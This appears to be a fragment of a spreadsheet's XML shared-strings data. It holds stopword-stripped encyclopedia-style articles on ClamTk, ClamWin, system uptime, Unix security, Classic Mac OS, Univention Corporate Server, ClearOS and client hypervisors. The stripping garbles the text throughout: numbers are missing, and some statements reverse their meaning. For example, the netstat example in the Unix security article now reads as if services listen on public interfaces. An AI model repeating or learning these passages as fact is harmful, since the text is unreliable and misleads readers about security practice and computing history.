reviewed compared, clamtk recommended average users described "lightweight".a 2019 review make tech easier included clamtk review best antivirus programs ubuntu. they reported, need good virus scanner, you’re command line, clamtk best choice."a rewiew derrik diener additive tips 2019 stated, "... like features clamav tool, dislike dealing command-line, you’ll useful features nice, easy-to-use interface clamtk takes advanced clamav features command-line wraps incredibly simple user interface average linux user use." also list antivirus software clamwin graphical interface clamav microsoft windows references external links official website</t>
  </si>
  <si>
    <t>ClamWin Free Antivirus</t>
  </si>
  <si>
    <t>clamwin free antivirus free open-source antivirus tool windows. provides graphical user interface clam antivirus engine. features scanning scheduler (only effective user logged in). automatic virus database updates regular basis. standalone virus-scanner. context menu integration windows explorer. add-in microsoft outlook. portable version used flash drive.there firefox extensions allow users process downloaded files clamwin. real-time scanning clamwin free antivirus scans demand; automatically scan files read written. non-affiliated projects clam sentinel winpooch add-ons provide real-time scanning capability clamwin. updates clamwin free antivirus virus database updated automatically detects connection internet. small balloon appears taskbar icon indicating completion status update process. retries establish connection server fails download updates first time. effectiveness historically clamwin free antivirus suffered poor detection rates scans slow less effective antivirus programs. example, 2009 clamwin free antivirus failed detect almost half trojan horses, password stealers, malware av-test's "zoo" malware samples.in 1–21 june 2008 test performed virus.gr, clamwin free antivirus version 0.93 detected 54.68% threats ranked 37th products tested; best scored 99%.in august-05 september 2009 test performed virus.gr, clamwin free antivirus version 0.95.2 detected 52.48% threats ranked products tested; best scored 98.89%.on september 2011 cnet gave clamwin free antivirus rating excellent, stars. also list antivirus software list free open-source software packages clamtk, similar interface clamav, linux desktop use. references external links official website clamwin free antivirus sourceforge</t>
  </si>
  <si>
    <t>ClamXav</t>
  </si>
  <si>
    <t>Uptime</t>
  </si>
  <si>
    <t>uptime measure system reliability, expressed percentage time machine, typically computer, working available. uptime opposite downtime. often used measure computer operating system reliability stability, time represents time computer left unattended without crashing, needing rebooted administrative maintenance purposes. conversely, long uptime indicate negligence, critical updates require reboots platforms. records 2005, novell reported server 6-year uptime. although might sound unusual, actually common servers maintained industrial context host critical applications banking systems. netcraft maintains uptime records many thousands hosting computers. server running novell netware reported shut years uptime failing hard disk.a cisco router reported running continuously years. determining system uptime microsoft windows windows task manager some versions microsoft windows include uptime field windows task manager, "performance" tab. format d:hh:mm:ss (days, hours, minutes, seconds). systeminfo output systeminfo command includes "system time" "system boot time" field. exact text format dependent language locale. time given systeminfo reliable. take account time spent sleep hibernation. thus, boot time drift forward every time computer sleeps hibernates. command command statistics sub-command provides date time computer started, statistics workstation statistics server variants. command stats shorthand statistics server. exact text date format dependent configured language locale. windows management instrumentation (wmi) uptime determined windows management instrumentation (wmi), querying lastbootuptime property win32_operatingsystem class. command prompt, done using wmic command: timestamp uses format yyyymmddhhmmss.nnn, example, computer last booted 2011 16:17:51.822. text "lastbootuptime" timestamp format vary language locale. also queried using variety application programming interfaces, including vbscript powershell. uptime.exe microsoft formerly provided downloadable utility called uptime.exe, reports elapsed time days, hours, minutes, seconds. time given uptime.exe reliable. take account time spent sleep hibernation. thus, boot time drifts forward every time computer sleeps hibernates. freedos uptime command also available freedos. version developed aitchison. linux using uptime users linux systems uptime utility, also displays system load averages past minute intervals: using /proc/uptime shows long system since last restarted: first number total number seconds system second number much time machine spent idle, seconds. multi core systems (and linux versions) second number idle time accumulated cpu. using uptime bsd-based operating systems freebsd, sysvr4 uptime command (see uptime(1) freebsd general commands manual). using sysctl there also method using sysctl call system's last boot time: openvms openvms systems, show system command used command prompt obtain system uptime. first line resulting display includes system's uptime, displayed days followed hours:minutes:seconds. following example, command qualifier /noprocess suppresses display per-process detail lines information. command output shows node jack january 2008 16:32:04.67 uptime: days hours minutes seconds. also availability list unix commands maintenance window system profiler transmission control protocol#tcp timestamps allow remote estimation uptime website monitoring (unix) display time system booted references</t>
  </si>
  <si>
    <t>UnixWare NonStop Clusters</t>
  </si>
  <si>
    <t>nonstop clusters (nsc) add-on package unixware allowed creation fault-tolerant single-system image clusters machines running unixware. first commercially available highly available clustering solutions commodity hardware. description provided full single-system image cluster: process migration processes started node cluster could migrated node. migration could either manual automatic (for load balancing). single process space processes visible nodes cluster. standard unix process management commands (ps, kill used process management. single root files directories available nodes cluster single space devices available node cluster. normal device naming convention modified node number device names. example, second serial port node would /dev/tty01h.3. partition scsi disk node might /dev/rdsk/n2c3b0t4d0s3. single space standard unixware mechanisms (shared memory, semaphores, message queues, unix domain sockets) available communication processes running node. cluster virtual address provided single address access cluster systems. incoming connections load-balanced available cluster nodes.the system designed high availability—all system services either redundant would fail-over node another advent node crash. disk subsystem either accessible multiple nodes (using fibre channel dual-ported scsi) used cross-node mirroring similar fashion drbd. history developed tandem locus computing corporation based transparent network computing technology. during lifetime project locus acquired platinum technology inc. team product transferred tandem. initially developed compaq integrity packaged cluster, consisting compaq proliant servers compaq servernet switches provide cluster interconnect inter-node communication path. form commercialized compaq supported qualified hardware compaq, later fujitsu-siemens. 2000 modified allow standard fast ethernet later gigabit ethernet switches cluster interconnect commercialized unixware nonstop clusters 7.1.1+ip. this release available commodity hardware, although recommended systems nodes used servernet interconnect. after sale unix business caldera systems announced long-term goal integrate product base unixware code caldera systems ceased distribution nsc, replacing reliant clustering solution 2001 compaq announced would release gpled version code, eventually became openssi. references</t>
  </si>
  <si>
    <t>Unix security</t>
  </si>
  <si>
    <t>unix security refers means securing unix unix-like operating system. secure environment achieved design concepts operating systems, also vigilant user administrative practices. design concepts permissions core security feature systems file system permissions. files typical unix filesystem permissions enabling different access file. permissions file commonly using chmod command seen command. example: -r-xr-xr-x root wheel 745720 2002 /bin/sh unix permissions permit different users access file. different user groups different permissions file. more advanced unix filesystems include access control list concept allows permissions granted multiple users groups. access control list used grant permission additional individual users groups. example: /pvr [u::rwx,g::r-x,o::r-x/u::rwx,u:sue:rwx,g::r-x,m::rwx,o::r-x] example, chacl command linux operating system, user granted write permission /pvr directory. user groups users unix style operating systems often belong managed groups specific access permissions. this enables users grouped level access system. many unix implementations additional layer security requiring user member wheel user privileges group order access command. root access most unix unix-like systems account group enables user exact complete control system, often known root account. access account gained unwanted user, results complete breach system. root account however necessary administrative purposes, security reasons root account seldom used purposes (the sudo program commonly used), usage root account closely monitored. root access visualised familiar superman stories using following analogy: using root account rather like superman; administrator's regular user like clark kent. clark kent becomes superman long necessary, order save people. reverts "disguise". root access used fashion. clark kent disguise really restrict though, still able super powers. this analogous using sudo program. user administrative techniques unix many tools improve security used properly users administrators. passwords selecting strong password guarding properly probably important things user improve unix security. unix systems, essential information users stored file /etc/passwdthis file keeps track users registered system main definitions. passwords, correctly, hash password, also stored place. entries /etc/passwd occupy exactly line each, following form: nickname:password_hash:userid:groupid:complete_name:home_dir:shell_bin example would since users must read access /etc/passwd file many common tasks /home /etc/passwd uids login names example), anyone could also read password hashes users. solve problem, file /etc/shadow created store password hashes, root read access. under password shadowing, field (password hash) replaced tells system retrieve corresponding user's password /etc/shadow file. /etc/shadow file often contains values first fields: xfze:$$1zuw2nx3sslp3qjm9myddgleapac36r/::::: remaining fields /etc/shadow file include: minimum number days password changes maximum number days password must changed number days warning given password must changed number days password must changed account becomes unusable date (expressed number days since january 1st, 1970) account expiredthese fields used improve unix security enforcing password security policy. users accounts administrators delete accounts promptly. sudo, only, remote root logins software maintenance patching operating systems, like software, contain bugs need fixing enhanced addition features. patching operating system secure manner requires software come trustworthy source altered since packaged. common methods verifying operating system patches altered include digital signature cryptographic hash, sha-256 based checksum, read-only media. from security standpoint, specific packaging method, dpkg package manager package manager format originally debian linux, respectively important features ensure integrity patch itself. source distributions source distributions include ability examine code suspicious content. drawback, absent accompanying cryptographic hash value, user must able perform security analysis code themselves. packages linux distributions package manager format providing base functionality software updates make cryptographic hashes ensure content integrity. hash values packaged file verified package installed. debian packages linux distributions debian .deb package format providing base functionality software updates make signatures ensure content integrity. signature computed package constructed verified later package installed. other vendors distributions regardless vendor distribution, software distributions provide mechanism verifying software legitimate modified since originally packaged. services unnecessary system software installed configured system. software longer required removed completely, possible. identify services running netstat lsof nmap sockstat (freebsd)the commands inetd xinetd super-servers variety network protocols rlogin, telnet ftp. turning unnecessary services using update-rc.d debian using chkconfig linux using /etc/rc.conf /usr/local/etc/rc.d freebsd (mention /etc/rc.local) using rc-update gentoo linuxthis approach usually called proactive security. there operating systems secure default. amongst others, free flavours (freebsd, netbsd, openbsd) proactively secure. example, output netstat netbsd workstation clearly outlines technique: following example system shows machine service listening public network interfaces computer. sendmail listening loopback interface only. access service restricted using firewall. file systems file system security file system security within unix unix-like systems based permission bits, user group bits, sticky bit, total bits. these permissions apply almost equally filesystem objects files, directories devices. permission bits divided three groups three bits each. first group describes permissions file owner, second group describes permissions assigned file, default group associated file owner directory containing file set-gid, third group describes permissions associated process user file. each group three bits contains indicating read, write execute access granted. case directories, execute access interpreted permission perform filename lookup within directory. user group bits, commonly abbreviated set-uid set-gid respectively, used change identity process executes file either bits set. file set-uid permission cause process executes file temporarily switch effective user file owner. file set-gid permission cause process executes file temporarily switch effective group file group. process alternate effective user group inherited file real user group inherited user logged system. this provides mechanism process limit access rights possesses code regions require access rights. this form security technique known privilege separation improves program security limiting unintended undesirable actions processes. directory set-gid permission cause newly created file initial file group value equal file group directory. this provides mechanism whereby subsystem, system's mail subsystem, create files common file group value set-gid processes within subsystem able read write file. sticky bit, formally known save text swap bit, derives name original purpose. originally sticky caused process's initial memory image stored contiguous image disk drive used store real memory pages use. this improved performance commonly executed commands making initial memory image readily available. modern unix systems longer perform function set, name preserved nonetheless. case files, sticky-bit used system indicate style file locking performed. case directories, sticky prevents process, super-user privileges effective user file owner, deleting file within directory. sticky commonly used publicly writable directories, various temporary working space directories system. root squash root squash special mapping remote superuser (root) identity using identity authentication (local user remote user). under root squash, client's (root) mapped 65534 (nobody). primarily feature available systems well. root squash technique avoid privilege escalation client machine suid executables setuid. without root squash, attacker generate suid binaries server executed root client, even client user superuser privileges. hence protects client machines malicious clients. protect clients malicious server (where root generate suid binaries), protect files user root malicious clients impersonate user). selinux selinux kernel extensions control access precisely, strictly defining files, folders, network ports resources accessed confined process. this system mostly used restrict processes (database, server) rather human users. also limit processes root. other distributions comparable alternatives like apparmor. viruses virus scanners unix-like operating systems immune microsoft windows viruses binaries created windows generally platforms. however, many unix like installations provide file storage services microsoft windows clients, samba software, unintentionally become repository viruses stored users. common unix servers mail transfer agents consequence email virus scanning often installed. clamav virus scanner available source code form used scan unix file systems viruses infect operating systems. there viruses worms target unix-like operating systems. fact, first computer worm—the morris worm—targeted unix systems. firewalls network firewall protects systems networks network threats exist opposite side firewall. firewalls block access strictly internal services, unwanted users cases filter network traffic content. iptables iptables current user interface interacting linux kernel netfilter functionality. replaced ipchains. other unix like operating systems provide native functionality open source firewall products exist. more detailed information iptables contained elsewhere. brief discussion contained order describe iptables used configure linux firewall. netfilter provides state-full packet filter configured according network interface, protocol, source and/or destination address, source and/or destination port state packet. network packet traverses several chains time received network interface time accepted host forwarded another host. common chains input, output forward. input chain traversed packets received network interface, regardless whether accepted host forwarded another host. output chain traversed packets transmitted network interface. forward chain traversed packets routed host network interface another, case multi-homed system system physical network interface). each built-in chains default policy defines action taken packet reaches chain. packet traversal ends rule matches packet action accept, drop, reject return. simplest iptables firewall consists rules desired service, followed rule indicates packets reach rule dropped. system permitted, example, incoming email traffic would rule accepted connections smtp port, dropped others. rule would required indicated established connections also permitted outgoing connections would receive responses systems. input chain following example shows simple packet filter input chain described example: chain input (policy drop packets, bytes) pkts bytes target prot source destination accept all—any anywhere anywhere state established accept tcp—any anywhere anywhere dpt:smtp all—any anywhere anywhere level warning drop all—any anywhere anywhere addition explicit drop action ensures packets discarded default policy input chain accidentally changed accept. output chain there less need output chain default policy output chain safely accept. instances desirable firewall limit certain outgoing connections certain approved systems. this known egress filtering used prevent viruses within firewall escaping systems. example, policy network limit outgoing email connections single authorized email servers combating e-mail spam. this could achieved following example: chain output (policy accept) pkts bytes target prot source destination drop tcp—any !server anywhere dpt:smtp there need include rules example default policy output chain accept. this rule assumes host acting firewall sending email itself, email server. this good assumption typically firewall system contains minimal amount system code needed firewall. restrictive output chain would contain permissive (accept) entries services accessed outside firewall restrictive (drop) policy chain itself. general secure network communication: layer layers 4,5: layer layer pptppacket sniffing: tcpdump, wiresharkattacks: middle attack land, ping death, christmas tree packet, denial service software tools based password/passphrase/key stealing attacks system. such strace/truss/tusc/dtrace/systemtap based ones. advanced rootkits, kernel modules, chkrootkit exploit details, buffer overflows, local remote service details banners smtp spam sendmail banners help header version etc. domain name system reverse mapping dnssec references general practical unix internet security, simson garfinkel gene spafford, o'reilly associates, 2003. external links unix security model server administration archived 2006-10-04 wayback machine robert moniot 2000 architectural overview unix network security robert reinhardt 1993 unix security papers</t>
  </si>
  <si>
    <t>Classic Mac OS</t>
  </si>
  <si>
    <t>(originally system software; retronym: classic series operating systems developed macintosh family personal computers apple inc. 1984 2001, starting system ending macintosh operating system credited popularized graphical user interface concept. included every macintosh sold developed, many updates system software done conjunction introduction macintosh systems. apple released original macintosh january 1984. first version system software, official name, partially based lisa apple previously released lisa computer 1983. part agreement allowing xerox shares apple favorable price, also used concepts xerox parc alto computer, former apple steve jobs lisa team members previewed. this operating system consisted macintosh toolbox "system folder", files loaded disk. name macintosh system software came 1987 system apple rebranded system 1996, starting officially version 7.6, part macintosh clone program. that program ended release 1997. last major release system 1999.initial versions system software application time. with macintosh 512k, system extension called switcher developed additional memory allow multiple programs remain loaded. software loaded program used memory exclusively; activated switcher program appear, even finder's desktop. with switcher, familiar clipboard feature allowed copy paste loaded programs across switches including desktop. with introduction system cooperative multitasking extension called multifinder added, allowed content windows program remain layered view desktop, later integrated system part operating system along support virtual memory. mid-1990s, however, contemporary operating systems windows os/2, nextstep brought pre-emptive multitasking, protected memory, access controls, multi-user capabilities desktop computers. macintosh's limited memory management susceptibility conflicts among extensions provide additional functionality, networking support particular device, significant criticism operating system, factor apple's declining market share time. after aborted attempts creating successor macintosh system software called taligent copland, four-year development effort spearheaded steve jobs's return apple 1997, apple replaced operating system 2001 named signifying underlying unix system family base shared jobs's development nextstep operating systems next computer. retained user interface design elements classic overlap application frameworks compatibility, operating systems otherwise completely different origins architectures. final updates released 2001 provided interoperability name "classic" signifies historical whole reference classic environment, compatibility layer helped ease transition (now macos). initial concept macintosh project started late 1978 raskin, envisioned easy-to-use, low-cost computer average consumer. september 1979, raskin began looking engineer could together prototype. bill atkinson, member apple lisa team, introduced raskin burrell smith, service technician hired earlier year. apple's concept macintosh deliberately sought minimize user's awareness operating system. many basic tasks required operating system knowledge systems could accomplished mouse gestures graphic controls macintosh. this would differentiate contemporaries ms-dos, command-line interface consisting terse, abbreviated textual commands. january 1981, steve jobs completely took macintosh project. jobs number apple engineers visited xerox parc december 1979, three months lisa macintosh projects begun. after hearing pioneering technology developed xerox parc former xerox employees like raskin, jobs negotiated visit xerox alto computer smalltalk development tools exchange apple stock options. final lisa macintosh operating systems concepts xerox alto, many elements graphical user interface created apple including menu bar, pull-down menus, concepts drag drop direct manipulation.unlike uses system power-on self-test (post) basic input/output system (bios), significantly larger holds code. much original coded andy hertzfeld, member original macintosh team. able conserve precious space writing routines assembly language code optimized "hacks," clever programming tricks. addition rom, also coded kernel, macintosh toolbox, desktop accessories (das). icons operating system, represent folders application software, designed susan kare, later designed icons microsoft windows 3.0. bruce horn steve capps wrote macintosh finder, well number macintosh system utilities. apple aggressively advertised machine. after release, company bought pages advertisement space 1984 november/december edition newsweek magazine. macintosh quickly outsold sophisticated much expensive predecessor, lisa. apple quickly developed macworks, product allowed lisa emulate macintosh system software system time discontinued rebranded macintosh many lisa's operating system advances would appear macintosh operating system system later. architecture compatibility early versions compatible motorola 68000-family macintoshes. apple introduced computers powerpc hardware, ported support architecture. last version could processor (the 68040). systems prior powerpc g3-based systems, significant parts system stored physical motherboard. initial purpose avoid 128kib initial macintosh—the initial roms 64kib. this architecture also allows completely graphical interface lowest level without need text-only console command-line mode: boot time errors, finding functioning disk drives, communicated user graphically, usually icon distinctive chicago bitmap font chime death series beeps. this contrast ms-dos cp/m computers time, display messages mono-spaced font black background, require keyboard rather mouse, input. provide niceties level, early depends core system software motherboard, also ensured apple computers licensed clones (with copyright-protected roms apple) clones several computer manufacturers years made macintosh clones capable running from 1995 1997, apple licensed macintosh roms several companies, notably power computing, umax motorola. these machines normally various versions classic steve jobs ended clone-licensing program returning apple 1997. support macintosh clones first exhibited system 7.5.1, first version include "mac logo variation original happy startup icon), first named "mac instead "system". these changes made disassociate operating system apple's macintosh models. file systems macintosh originally used macintosh file system (mfs), flat file system level folders. this quickly replaced 1985 hierarchical file system (hfs), true directory tree. both file systems otherwise compatible. improved file system named plus ("hfs+" "mac extended") announced 1997 implemented 1998.files file systems used dos, windows, unix, operating systems "fork". contrast, give files different "forks". data fork contains sort information file file systems, text document bitmaps image file. resource fork contains structured data menu definitions, graphics, sounds, code segments would incorporated program's file format systems. executable file might consist resources (including code segments) empty data fork, data file might data fork resource fork. word processor file could contain text data fork styling information resource fork, application recognize styling information still read text. hand, forks would provide challenge interoperability operating systems. copying transferring file non-mac system, default implementations would simply strip file resource fork. most data files contained nonessential information resource fork, window size location, program files would inoperative without resources. this necessitated encoding schemes binhex macbinary, allowed user encode dual-forked file single stream, inversely take single stream so-encoded reconstitute dual-forked file usable release history system part apple's goal creating computer appliance-like simplicity, explicit distinction made operating system software hardware runs because this, early versions operating system distinct name. software consists user-visible files: system file, finder, application used file management also displays desktop. files contained folder directory labeled "system folder", contains resource files, like printer driver, needed interact system. version numbers operating system based version numbers files. system 1.0, 1.1, flat file system named macintosh file system (mfs). finder provides virtual folders could used organize files, folders visible application actually exist disk. system added support appletalk newly introduced laserwriter system (finder 5.0) introduced hierarchical file system (hfs) real directories. this version specifically support hard disk implements ram; startup floppy disks remain volumes. system (finder 5.1) introduced macintosh plus, officially implementing hfs, 800k startup drives, support several technologies including scsi appleshare, trash "bulging" (i.e., trash contains files, gains bulged appearance). system released macintosh system first shipped macintosh ii—these machines required additional support first expansion slots, apple desktop (adb), internal hard drives and, macintosh external color displays first motorola 68020 processor.these releases application time, except desk accessories, though special application shells multi-mac switcher (discussed multifinder) could work around this. visible changes best reflected version number finder, major leaps found 1.x, 4.x, 5.x, 6.x. late 1990s, apple retroactively gave older releases single name. system software towards 1987, apple introduced package titled "apple macintosh system software update 5.0". first time, macintosh operating system offered distinct retail product included four 800k disks three manuals, cost us$49. software still freely available user groups bulletin board services. while product presented update operating system "version 5.0", number appear software itself. three four disks (system tools system tools utilities bootable, user boot whichever floppy contain tools user needs. instance, system tools disk printer drivers, utilities disk disk first apple setup. because disks named system tools, users press commonly referred version "system tools 5.0". primary feature system multifinder, extension lets system several programs once. system uses cooperative multitasking model, meaning time given background applications foreground application yields control. change system functions applications already calling handle events make many existing applications share time automatically, well allowed perform tasks background. users also choose multifinder, thereby using single application time. 1990 infoworld tested four multitasking options mac, viewing multifinder positively overall, noting presence halved speed file transfer printing compared single-tasking system without multifinder. system software system software (also referred "system consolidation release macintosh system software, producing complete, stable, long-lasting operating system. major hardware introductions requiring additional support system 68030 processor 1.44 superdrive debuting macintosh macintosh se/30. later updates include support first specialized laptop features introduction macintosh portable. from system forward, finder unified version number closely matching system, alleviating much confusion caused often considerable differences earlier systems. system 7/mac 1991, system released. major upgrade system adding significant user interface overhaul, applications, stability improvements many features. introduction coincides release provided support 68040 macintosh line. system numerous changes macintosh platform including proliferation macintosh models, power macintosh transition well rise microsoft windows, increasing computer networking explosion popularity internet. significant features system virtual memory support, essential subsystem anticipated years, exists previous systems third party extension named virtual connectix. accompanying move 32-bit memory addressing, necessary ever-increasing amounts available motorola 68030 cpu, 68020 cpus 68851 pmmu. this process involves making routines code full 32-bits pointer address—prior systems used upper bits flags. this change known "32-bit clean". while system 32-bit clean, many existing machines thousands applications not, time process completed. ease transition, "memory" control panel contains switch disable feature, allowing compatibility older applications. another notable system feature built-in cooperative multitasking. system software function optional multifinder. system also introduced aliases, similar symbolic links unix, shortcuts introduced later versions microsoft windows, shadows os/2. system extensions enhanced moved subfolder; subfolder system folder also created control panels. system 7.5, apple includes extensions manager, previously third-party program simplified process enabling disabling extensions. apple menu, home desk accessories system made general-purpose: user could make often-used folders applications—or anything else desired—appear menu placing aliases "apple menu items" subfolder system folder. system also introduced following: applescript, scripting language automating tasks; 32-bit quickdraw, supporting so-called "true color" imaging, previously available system extension; truetype, outline font standard. trash, system earlier, empties automatically shutting computer—or, multifinder running, launching application. system reimplements trash special hidden folder, allowing files remain across reboots user deliberately chose "empty trash" command. system system mainly bugfix release, minor features added. major features system moving fonts system file fonts folder system folder. previously resource-copying utility resedit font mover required installing fonts. system first macintosh operating system cost money (all previous versions free sold cost floppies), also received "pro" sibling (version 7.1.1) extra features. system 7.1.2 first version support powerpc-based macs. system also introduces system enablers method support models without updating actual system file. this leads extra files inside system folder (one model supported). system system introduces large number features, many based shareware applications apple bought included system. newer powerpc machines, system stability problems partly memory manager (which turned off), issues handling errors powerpc code (all powerpc exceptions type 11). these issues affect 68k-architecture machines. system contemporary apple's failed copland effort well release windows stability improved powerpc-based macs 7.6, dropped "system" moniker trademarkable name needed order license growing market third-party macintosh clone manufacturers. required 32-bit-clean roms, dropped support every 68000 processor, well iix, iicx, se/30. released july 1997, month steve jobs became facto apple. mainly released keep moving forward difficult time apple. initially planned 7.7, renumbered exploit legal loophole accomplish jobs's goal terminating third-party manufacturers' licenses system shutting macintosh clone market.mac added number features abandoned copland project, leaving underlying operating system unchanged. multi-threaded finder included; files could copied background. changed appearance shaded greyscale look named platinum, ability change appearance themes (also known skins) added control panel (though platinum shipped). this capability provided "appearance" layer within significant changes. apple sold million copies first weeks availability million within months. light apple's financial difficulties time, large grassroots movement among users upgrade "help save apple". even pirate groups refused redistribute introduced updated version hierarchical file system named hfs+, fixed many limitations earlier system continued used macos macos high sierra, replaced apple file system. there interface changes separating network features printing, improvements application switching. however, underlying technical respects, different system focuses speed stability, code replaced modern code native powerpc. also improved appearance user interface, although theming feature late development. last major revision classic released october 1999. generally steady evolution early development releases numbered 8.7. added improved support airport wireless networking. introduced early implementation multi-user support. though true multi-user operating system, allow multiple desktop users data system settings. improved sherlock search engine added several search plug-ins. also provides much improved memory implementation management. applescript improved allow tcp/ip networking control. also makes first centralized apple software update find install hardware updates. other features included on-the-fly file encryption software code signing keychain technologies, remote networking file server packages, much improved list drivers. also added transitional technologies help application developers adopt features introduction public, help ease transition. these included apis file system bundling carbon library apps could link instead traditional libraries—apps adapted could natively well. other changes made beginning update allow launched classic environment within final update classic version 9.2.2, released december 2001. transition macos (originally named "mac 2012 2016) apple's current operating system officially succeeded classic 2001. although originally marketed simply "version history largely independent earlier releases. macos architectural legacy successor classic legacy. however, unlike classic unix-based operating system built nextstep technology developed next late 1980s early 1997, apple purchased company, steve jobs returned apple. macos also makes codebase kernel, core components based upon apple's open source darwin operating system. early version operating system, server 1.0, released 1999. retains "platinum" appearance classic even resembles openstep places, first version arrive aqua user interface. desktop version, 10.0, followed march 2001, supporting aqua user interface. since then, several versions operating system released. renamed 2012 "macos" 2016. users classic generally upgraded criticized early years difficult less user-friendly original lack certain features reimplemented slower hardware (especially older hardware), incompatibilities older because drivers (for printers, scanners, tablets, etc.) written older compatible inconsistent program support classic environment program used older operating system's programs lack support older apple computers late 1997; macintosh users continued using older classic years original release steve jobs encouraged people upgrade staging mock funeral wwdc 2002. classic powerpc versions including 10.4 tiger include compatibility layer running older applications, classic environment. originally codenamed "blue box", environment runs nearly complete operating system, version later, application. this allows applications ported carbon this reasonably seamless, though "classic" applications retain original appearance gain "aqua" appearance. early world powerpc-based macs shipped well installed user—it installed default hardware revisions released 10.4. most well-written "classic" applications function properly environment, compatibility assured software written unaware actual hardware interact solely operating system. classic environment available intel-based systems latest apple silicon macs incompatibility hardware. emulation emulators third-party macintosh emulators, vmac, basilisk executor, eventually made possible classic intel-based pcs. these emulators restricted emulating series processors, versions succeeded 8.1, required powerpc processors. most also required image hardware interface supporting real chip; requiring image dubious legal standing image infringe apple's intellectual property. notable exception executor commercial software product abacus research development, product used 100% reverse-engineered code without apple technology. extremely quickly never achieved minor subset functionality. programs completely compatible many extremely crash-prone all. executor filled niche market porting applications platforms; development ceased 2002 source code released author late 2008. emulators using images offered near complete compatibility, later versions offered excellent performance modern processor performance increased exponentially. apple included emulator seamlessly powerpc-based versions classic powerpc emulators 2021 capable powerpc emulator qemu comparison 68k-emulator development, powerpc emulation complex requires power. emulator capable running classic full speed networking sound cases. qemu official support classic version 10.0 including 10.5. qemu several advantages powerpc emulators namely supporting wide range platforms linux windows current architectures.another powerpc emulator sheepshaver, around since 1998 beos powerpc platform, 2002 open sourced, efforts began port platforms. originally designed platforms required actual powerpc processor present machine running similar hypervisor. although provides powerpc processor support, 9.0.4 emulate memory management unit. other examples include shapeshifter developer created sheepshaver), fusion, pearpc ifusion. latter classic powerpc "coprocessor" accelerator card. using method said equal better speed macintosh processor, especially respect series real macs running trap mode, hampering performance.apple's rosetta powerpc emulator allowing intel-based macs powerpc macos applications, support classic (9.2.2 earlier) applications. timeline also list apple operating systems comparison operating systems history graphical user interface inside macintosh apple computer, inc. microsoft corp. list macintosh software notes references external links apple discussions: classic apple's official forum classic real history article history guis apple macintosh system comprehensive guide releases prior system folklore.org site anecdotes shared creators first macintosh vintage museum information macintosh systems system system macintosh system browser web-based simulator macintosh system browser web-based simulator byte magazine september 1986 feature amiga macintosh</t>
  </si>
  <si>
    <t>Univention Corporate Server</t>
  </si>
  <si>
    <t>univention corporate server (ucs) server operating system derived debian integrated management system central cross-platform administration servers, services, clients, desktops users well virtualized computers operated ucs. addition operation local, virtual instances, also operated cloud environments. integration open source software samba univention also supports functions provided many companies microsoft active directory administration computers operated microsoft windows. ucs-based components ucs-certified, third-party products installed univention center. provides center applications runtime environment services operation including central, consistent management apps. docker containers also systems several apps available center docker-based.univention member open source business alliance supports creation open source business alliance open source software stacks. history impulse development ucs, began 2002, lack standardised linux server operating system offering companies organisations alternative microsoft's domain concept proprietary directory service active directory. comparable linux solutions (e.g., suse hat) offer integrated, cross-system user computer management system, result corresponding solutions configured maintained individually. important early driving forces development initially oldenburgische landesbank department bremen senator education science, product ready market launch 2004. since then, addition versions, number software solutions based main product also launched. predominantly employed german-speaking world companies public organisations wide range sectors fields, among others regional government authority federal state brandenburg. 2005, univention began market also german-speaking countries. today, used many european countries also outside europe, example, australia, nigeria univention established subsidiary 2013. licenses editions open-source software; proprietary developments univention gmbh included published version 2.3. with launch version 2.4, company switched agpl. there also range software appliances based (e.g., groupware, desktop service management fields). since april 2015 freely available companies form core edition, replaced previous "free personal use" license. this core edition fully featured version differs fee-based edition terms product liability support. structure components univention corporate server based debian linux distribution. there numerous open source applications integrated ucs, example samba, authentication service kerberos, virtualization software kvm, nagios monitoring servers. core important unique selling point central administration tool "univention management console", allows cross-system cross-location management infrastructures. uses directory service openldap save data identity system management. administration tools operated web-based applications command-line interfaces. thanks integrated administration service virtual machine manager (uvmm), administration tools also allow central administration virtualized servers clients, hard drives, cdrom images well physical systems operated.the manufacturer goes great lengths guarantee possibilities integration existing environments open standards supplied connectors. way, integrated tool active directory connection allows bidirectional synchronisation microsoft directory service active directory directory service used ucs, openldap. addition, offers various interfaces manufacturers application software enabling integrate applications management system. since 3.1, provides "univention center" graphic management component installation deinstallation components ucs-certified third-party appliances. univention center includes, beside univention solutions, example, open source groupware solutions kopano, open-xchange, document management system agorum core, slack alternative rocket.chat dropbox alternatives owncloud nextcloud, collaboration solutions onlyoffice collabora. references external links official website univention github</t>
  </si>
  <si>
    <t>ClearOS</t>
  </si>
  <si>
    <t>clearos (also known clearos system, formerly clarkconnect) linux distribution clearfoundation, network gateway, file, print, mail, messaging services. history clearos based centos enterprise linux, designed small medium enterprises network gateway network server web-based administration interface. positioned alternative windows small business server. clearos successor clarkconnect. software built clearfoundation, support services purchased clearcenter. clearos removes previous limitations mail, dmz, multiwan functions.as clearos release, distribution full-featured operating system gateway, network servers built source packages enterprise linux.clearos aims replace, small business server, windows sbs. features features include: stateful firewall (iptables), networking security intrusion detection prevention system (snort) virtual private networking (ipsec, pptp, openvpn) proxy, content filtering antivirus (squid, dansguardian) e-mail services (webmail, postfix, smtp, pop3/s, imap/s) groupware (kolab) database server (easy deploy lamp stack) file print services (samba cups) flexshares (unified multi-protocol storage currently employs smb, http/s, ftp/s, smtp) multiwan (internet fault tolerant design) built-in reports system statistics services (mrtg others) awards recognition august 2009: comptia breakaway clearcenter's clearos wins 'best product' comptia breakaway. august 2010: comptia breakaway clearcenter's clearos repeats 'best product' comptia breakaway. july 2012: softpedia open source, free powerful network gateway linux server operating system february 2014: security firewall distributions review june 2015: small business computing best linux servers small business september 2015: linuxvoice service distro group test (see pages 58-63) also windows clarkconnect smoothwall m0n0wall server zentyal clearfoundation references external links official website clearos distrowatch clark connect distrowatch clarkconnect.com clarkconnect.org recycle tired computer internet gateway pointclark networks clarkconnect becomes clearos clearfoundation clearcenter</t>
  </si>
  <si>
    <t>Client hypervisor</t>
  </si>
  <si>
    <t>computing, client hypervisor hypervisor designed client computers laptops, desktops workstations, rather server. technique host virtualization enables parallel execution multiple operating systems virtual machines) shared hardware. these guest systems used wide variety tasks normally performed dedicated physical computer systems. client hypervisors included cloud computing iaas (infrastructure service) designs. some well-known client hypervisors vmware workstation, virtualbox virtualpc. client hypervisors categorized types: type (bare metal): type client hypervisor runs directly host machine's hardware serves host operating system, providing hardware access guests drivers. also, create layer layer allocate system resources installed virtual machines. type (virtualized): type client hypervisor operates inside host operating system stand-alone application invokes master operating system access physical computer's resources. references</t>
  </si>
  <si>
    <t>Climate Savers Computing Initiative</t>
  </si>
  <si>
